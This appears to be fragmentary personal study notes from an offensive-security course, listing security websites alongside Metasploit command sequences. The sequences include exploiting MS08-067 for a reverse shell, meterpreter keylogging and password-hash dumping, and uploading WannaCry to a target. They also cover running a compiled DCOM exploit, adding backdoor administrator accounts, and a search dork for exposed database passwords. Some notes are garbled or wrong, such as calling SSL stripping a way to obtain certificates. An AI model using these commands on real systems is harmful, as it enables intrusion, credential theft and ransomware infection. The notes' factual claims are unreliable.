
Drive-by Download --> Clicking triggers the execution of a process

Advanced malware is polymorphic and mutating; each attack is different.


Ransomware

www.zone-h.org indicators
https://www.openbugbounty.org/
hackertarget.com
darkreading.com
lists.astaro.com
Crimeware --> development of malicious software

www.owasp.org
Broken Authentication
A logon must be enforced for every request

Malware traverses all layers of the OSI model.


www.chkrootkit.org
veriato.com employee monitoring
blackhat.com

Pwn2Own hacking contest


DARKODE.COM
malwarebytes.com
Windows sysinternals

hardzone.es

intext:DB_PASSWORD || intext:"MySQL hostname" ext:txt

haveibeenpwned.

fastcompany.com
https://www.exploit-db.com/google-hacking-database/9/
http://securityalert.knowem.com/

https://www.offensive-security.com/metasploit-unleashed/mimikatz/

project-rainbowcrack.com

ssl strip -------> to obtain a digital certificate

#setoolkit

www.darkreading.com
https://www.schneier.com/
skimmer: ATM fraud

https://www.cybrary.it/

Chema Alonso Eleven Paths

ancalog.tech
rusploit.com
ofex-exploit.com

Marcus Hutchins
Shadow Brokers

shodan.io online scanner


rdesktop -u 199.130.9.35

http://www.irongeek.com/

invicea --> FBI

BTS NSS Lab

www.tripwire.com free for Linux

Sheila A. Berta

msf exploit>exploit
meterpreter> upload -f wannacry_original.exe

Metasploit icon
service postgresql start
service postgresql status

updates the DB, close the window

open a terminal and run msfconsole

Smashing the Modern Stack, paper .oO Phrack


Compile the source: gcc -o dcom-attack dcom.c

./dcom-attack 0 172.16.1.51

Zenmap network scanner

Add a user
net user mario /add

PlugBot - - Hardware hacker

BulletProof

Search iis
Search Oracle
search decom

use exploit windows/smb.


show options

Set payload windows/ (TAB)


Set payload windows/ command
set RHOST 192.168.1.1
show options
set USER username
set PASS mypassword
exploit
=========================================================================
msfconsole
db_status
search netapi
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/reverse_tcp
show options
set LHOST 192.168.200.129 KALI
set RHOST 192.168.200.130
exploit

c> net user cabron joder /ADD


c> net localgroup administrators cabron /ADD

=========================================================================
apt-get update && apt-get upgrade && apt-get dist-upgrade

chroot runs (jailed or confined)

if exploit is run without selecting a PAYLOAD


meterpreter>
background -> runs the process in batch mode
sessions -l -> displays the channel
ps -> view processes
ps -ef
pstree -> shows the process tree
getpid -> shows the process in which Metasploit is hosted
migrate 1712 -> migrates to another process, e.g. explorer

sessions -i <channel 1,2,3.> -> selects the channel

keyscan_start
keyscan_dump
keyscan_stop
background
use post/windows/capture/key
hashdump

rainbow table cracking tool

crackstation.net

shell

run keylogrecorder

meterpreter
download
pwd
lpwd
download -r C:\\WINDOWS\\system32\\xcopy.exe

=====================================================================
Install VMware Tools
cp /media/cdrom0/VMware-tools... /etc/VMware-toos
/opt/vmware-tools/
tar -zxvf VMwaretools....tar.gz
cd VMware-Tools# ./vmware_install

====================================================================

set PAYLOAD windows/meterpreter/bind_tcp
